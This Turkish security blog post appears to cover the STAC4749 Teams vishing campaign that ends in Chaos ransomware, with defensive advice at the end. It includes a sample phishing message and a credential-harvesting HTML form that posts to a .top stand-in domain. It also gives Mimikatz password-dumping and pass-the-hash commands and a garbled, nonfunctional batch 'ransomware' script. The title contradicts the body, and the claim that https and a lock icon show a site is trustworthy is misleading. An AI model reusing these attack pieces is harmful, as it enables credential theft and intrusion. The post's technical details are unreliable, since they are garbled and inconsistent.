Microsoft Teams Vishing Saldırıları: IT Destek Kılığına Başvurmadan Hızlı Ransomware Enfeksiyonu

Sophos tarafından tespit edilen STAC4749 operasyonu, vishing saldırılarını Microsoft Teams üzerinden IT desteği kılığına bürünmeden doğrudan Chaos ransomware dağıtımına kadar hızlandırdı. North Amerika'daki düzinelerce kuruluşu etkileyen saldırının teknik detayları ve korunma yöntemleri.

I
ITWISE
2 görüntülenme
Microsoft Teams Vishing Saldırıları: IT Destek Kılığına Başvurmadan Hızlı Ransomware Enfeksiyonu

Sorun Tanımı

STAC4749 operasyonu, Sophos tarafından Ağustos 2024'te keşfedilen ve Microsoft Teams platformunu hedef alan vishing (sesli phishing) saldırıları ile başlayan sofistike bir siber saldırı zinciridir. Geleneksel IT destek kılığına bürünmeyen bu saldırı, 17 saatten kısa sürede Chaos ransomware dağıtımına kadar ilerlemektedir. Saldırganlar, .top alan adlarını, gerçekçi çalışan isimlerini ve uzaktan erişim araçlarını kullanarak North Amerika'daki düzinelerce kuruluşu hedef almıştır.

Saldırının Ana Bileşenleri

  1. Başlangıç Vektörü: Saldırganlar, Microsoft Teams üzerinden hedef çalışanlara doğrudan mesaj göndererek IT destek talebi olarak sunulan sahte yardım önerileriyle temas kurmaktadır.
  2. Etki Alanı Kullanımı: Operasyon, .top alan adı uzantısını kullanarak kurumsal ortamda geçerliymiş gibi görünen sahte web siteleri ve kimlik doğrulama sayfaları oluşturmuştur.
  3. Sosyal Mühendislik: Saldırganlar, hedef organizasyonun çalışanlarına ait gerçekçi isimler ve roller kullanarak güvenilirliği artırmaktadır.
  4. Hızlı Yatay Hareket: Kurbanın sistemine erişim sağlandıktan sonra, saldırganlar uzaktan erişim araçları (örn. AnyDesk, TeamViewer) aracılığıyla ağ içinde hızla yayılmaktadır.
  5. Ransomware Dağıtımı: 17 saatten kısa sürede, Chaos ransomware yükü dağıtılarak kurumsal veriler şifrelenmekte ve fidye talebi sunulmaktadır.

Saldırı Adımları ve Teknik Detaylar

1. İlk Temas: Microsoft Teams Vishing

Saldırganlar, hedef organizasyonun çalışanlarına doğrudan Microsoft Teams mesajları göndermektedir. Bu mesajlar genellikle aşağıdaki içeriklere sahiptir:

  • Konu: "IT Destek Talebi" veya "Acil Sistem Kontrolü"
  • İçerik: "Merhaba, sisteminizde bir güvenlik açığı tespit edildi. Lütfen aşağıdaki bağlantıya tıklayarak sorunu çözün."

Örnek Saldırı Mesajı

Kimden: IT Destek 
Konu: Acil: Sistem Güvenlik Açığı Tespiti

Merhaba [Çalışan Adı],

Sistemimizde bir güvenlik açığı tespit edildi. Lütfen aşağıdaki bağlantıya tıklayarak sorunu acilen çözün:
https://secure-fix.companyxyz.top/update

Teşekkürler,
IT Destek Ekibi

Uyarı: Resmi olmayan IT destek taleplerine asla yanıt vermeyin. Microsoft Teams üzerinden gelen mesajların kaynağını doğrulamak için doğrudan şirket IT departmanınızı arayın veya resmi destek kanallarını kullanın.

2. Sahte Web Siteleri ve Kimlik Doğrulama

Saldırganlar, .top alan adlarını kullanarak kurumsal ortamda geçerliymiş gibi görünen sahte web siteleri oluşturmuştur. Bu siteler genellikle aşağıdaki özelliklere sahiptir:

  • Kurumsal e-posta giriş sayfaları
  • VPN veya uzaktan erişim portalları
  • Microsoft 365 veya Azure kimlik doğrulama sayfaları

Sahte Kimlik Doğrulama Sayfası Örneği

<html>
<head><title>Microsoft 365 - Güvenlik Doğrulama</title></head>
<body>
    <form action="https://companyxyz.top/auth/login.php" method="POST">
        <label>E-posta Adresi:</label>
        <input type="text" name="email" placeholder="user@company.com" required>
        <label>Şifre:</label>
        <input type="password" name="password" required>
        <button type="submit">Giriş Yap</button>
    </form>
</body>
</html>

İpucu: Tarayıcınızın adres çubuğundaki kilit simgesi ve URL'nin https:// ile başlaması, site güvenilirliği konusunda ilk göstergedir. Resmi olmayan domainlerdeki sitelerden asla kimlik bilgilerinizi girmeyin.

3. Uzaktan Erişim ve Ağ İçinde Yayılma

Kimlik bilgileri ele geçirildiğinde, saldırganlar aşağıdaki adımları izleyerek ağ içinde yayılmaktadır:

  1. AnyDesk/TeamViewer Kurulumu: Kurbanın sistemine uzaktan erişim araçları yüklenir.
  2. Yatay Hareket: Saldırganlar, Active Directory üzerinden diğer sistemlere erişim sağlamak için Pass-the-Hash veya Pass-the-Ticket saldırıları gerçekleştirir.
  3. Yönetici Ayrıcalıkları Elde Etme: Yerel yönetici hesaplarının şifreleri ele geçirilerek ağın tam kontrolü hedeflenir.

Yayılma Komutları (PowerShell)

# Aktif dizin kullanıcılarını listele
Get-ADUser -Filter * -Properties * | Select-Object SamAccountName, UserPrincipalName, Enabled

# Yerel yönetici hesaplarının şifrelerini sızdırma (Mimikatz kullanımı)
sekurlsa::logonpasswords

# Pass-the-Hash saldırısı
sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:HASH

4. Chaos Ransomware Dağıtımı

Saldırganlar, ağın tam kontrolünü ele geçirdikten sonra Chaos ransomware yükünü aşağıdaki adımlarla dağıtmaktadır:

  1. Ransomware Bulaştırma: \network ile older ansomware.exe yoluyla tüm ağdaki sistemlere bulaştırılır.
  2. Dosya Şifreleme: .chaos uzantısı eklenerek dosyalar şifrelenir.
  3. Fidye Notu: README_TO_DECRYPT.txt dosyasıyla kurbanlara şifre çözme talimatları sunulur.

Chaos Ransomware Komut Dosyası Örneği

@echo off
set TARGET_DIR=\networkileolder
set RANSOMWARE=ransomware.exe

for /R %TARGET_DIR% %%F in (*) do (
    if not %%~xF==.chaos (
        copy "%RANSOMWARE%" "%%F.chaos"
        del "%%F"
    )
)

Önemli: Fidye ödemesi asla önerilmez. Fidye ödendiğinde bile verilerinizin geri yüklenmesi garanti edilmemektedir. Ransomware saldırılarına karşı yedekleme stratejileri ve erişim kontrolleri hayati önem taşır.

Korunma ve Müdahale Yöntemleri

1. Önleyici Tedbirler

  1. Eğitim ve Farkındalık:
    • Çalışanlara vishing ve phishing saldırıları konusunda düzenli eğitimler verin.
    • Sahte e-posta ve mesajları tanıma konusunda simülasyonlar gerçekleştirin.
  2. Çok Faktörlü Kimlik Doğrulama (MFA):
    • Tüm Microsoft 365, VPN ve uzaktan erişim sistemlerine MFA uygulayın.
    • MFA yöntemleri olarak Microsoft Authenticator, Google Authenticator veya donanım tokenleri kullanın.
  3. Güvenlik Yazılımları:
    • Gelişmiş EPP/EDR çözümleri (örn. CrowdStrike, SentinelOne) kullanarak anormal davranışları tespit edin.
    • Microsoft Defender for Office 365 ve Microsoft Defender for Endpoint gibi araçlarla e-posta ve uç nokta koruması sağlayın.
  4. Domain ve SSL Kontrolleri:
    • .top, .gq gibi şüpheli alan adlarını bloke edin.
    • SSL sertifikalarının geçerliliğini otomatik olarak doğrulayın.
  5. Uzaktan Erişim Politikaları:
    • AnyDesk/TeamViewer kullanımını kısıtlayın ve yalnızca onaylı araçların kullanımına izin verin.
    • Uzaktan erişim için VPN ve Zero Trust mimarisi uygulayın.

2. Acil Müdahale Adımları

Saldırı tespit edildiğinde aşağıdaki adımları izleyin:

  1. Saldırıyı İzole Edin:
    • Etkilenen sistemleri ağdan fiziksel olarak ayırın.
    • VPN bağlantılarını kapatın ve uzaktan erişim araçlarını devre dışı bırakın.
  2. Kimlik Bilgilerini Sıfırlayın:
    • Tüm kurumsal hesapların şifrelerini değiştirin.
    • MFA cihazlarını ve tokenlerini yeniden oluşturun.
  3. Logları İnceleyin:
    • Microsoft 365, Active Directory ve güvenlik yazılımlarından logları toplayın.
    • Saldırının kaynağını ve yayılma yolunu belirleyin.
  4. Ransomware Temizleme:
    • Etkilenen sistemleri temiz bir yedekten geri yükleyin.
    • Saldırganlar tarafından bırakılan sürekli erişim (persistence) mekanizmalarını temizleyin.
  5. Yasal ve İletişim Yükümlülüklerini Yerine Getirin:
    • Saldırıyı veri koruma yetkililerine bildirin (örn. KVKK, GDPR).
    • Müşterilerinizi ve iş ortaklarınızı şeffaf bir şekilde bilgilendirin.

3. İyileştirme ve Sürekli İzleme

  1. Güvenlik Politikalarını Güncelleyin: Uzaktan erişim, kimlik doğrulama ve ağ izolasyonu konularında politikaları revize edin.
  2. Sürekli İzleme ve Tespit: SIEM çözümleri (örn. Splunk, IBM QRadar) kullanarak ağ trafiğini ve uç nokta aktivitelerini sürekli izleyin.
  3. Yedekleme Stratejilerini Gözden Geçirin:
    • 3-2-1 kuralını uygulayın (3 kopya, 2 farklı ortam, 1 offsite).
    • Yedekleri okunamaz ve izole edilmiş ortamlarda saklayın.
  4. Saldırı Simülasyonları: Düzenli olarak penetrasyon testleri ve saldırı simülasyonları gerçekleştirin.

Sonuç

STAC4749 operasyonu, siber saldırganların sosyal mühendislik ve hızlı saldırı zincirleri kullanarak kurumsal ağlara sızma yöntemlerinde ne kadar ileri gittiklerini göstermektedir. Geleneksel IT destek kılığına bürünmeyen bu saldırılar, çalışan farkındalığı, çok katmanlı güvenlik kontrolleri ve hızlı müdahale planları gerektirmektedir. Kurumlar, MFA, EDR çözümleri, güvenlik eğitimleri ve yedekleme stratejileri gibi temel güvenlik önlemlerini uygulamalıdır. Unutulmamalıdır ki, siber güvenlik bir süreçtir, sonuç değil.

Kaynak

4sysops